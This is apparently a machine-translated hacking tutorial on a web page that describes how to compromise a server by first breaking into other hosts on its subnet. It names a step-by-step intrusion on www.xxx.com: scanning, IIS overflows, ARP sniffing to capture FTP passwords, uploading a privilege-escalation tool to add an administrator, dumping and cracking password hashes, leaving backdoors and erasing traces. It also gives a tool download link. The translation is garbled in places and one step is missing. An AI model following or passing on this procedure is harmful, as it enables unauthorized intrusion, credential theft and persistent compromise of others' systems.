1. What is penetration attack:
Simply put, there are no obvious system vulnerabilities on the hacked host, and the same
Other hosts in the CIDR block.
Core technologies:
1: Data sniffing in exchange and non-exchange environments,
2: IP spoofing is still available for linxu/Unix systems.
2. Attack Process:
Scan hosts (determine the system type, whether to enable ftp, telnet, and whether to use SSH)
|
Scan other hosts in the same subnet (locate the vulnerability and win admin, preferably open 3389)
|
Determine the network topology (locate the gateway and determine whether it is an exchange or non-exchange environment)
|
Install appropriate sniffing data programs on other hacked hosts
|
Use the user name and password to access the target...
|
Leave a backdoor and clear the footprints...
3.www.xxx.com entire process of hacking
1. Ping the IP address (assuming the name is aa) and check that the returned TTL is more than one hundred, most of which are NT.
2. Open the X-SCANER, look at the open port, not much but open ftp, version serv-U4.0
No holes (no other scans will be written. In short, there are no holes in the host ).
3. Use X-SCANER to scan the same cnetwork (an IP segment) the key is the IIS hole (find four or five idq/IDA overflow ).
4. Check what ports have been opened for these four or five machines (lucky enough, one of them has opened port 3389 ).
5. Enter the host with 3389 enabled (assuming the name is BB) and install capturenet (one type can only be non-switched
Environment is useful for sniffing), run to see if it is not good, only to receive their own data flow and broadcast data, the original network
Vswitch used.
6. Install arpsnifer on BB (sniffer http://666w.com/tools/aps.zip in SWAp environment) and tracert on other hosts
Click here to find the gateway (you can see the BB TCP/IP settings ).
7. Run arpsnifer, target AA, and listening port 21 on BB.
9. Wait... a few days later, log on to BB to view the log file of arpsnifer and find the user name and password!
Go to 10.ftp(proactive and unlimited). Upload the latest Privilege Escalation tool eruanasx.exe/DLL (and a bat file) to the executable directory and execute the command ...... add an administrator first! (The system does not have the latest hotfix)
11. Then try using the IPC connection and prompt "command completed successfully" ...... Haha finally won the admin :)
12. Run pwdump3 to obtain the password hash of all users on AA, and then use LC4 to crack the password ......
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
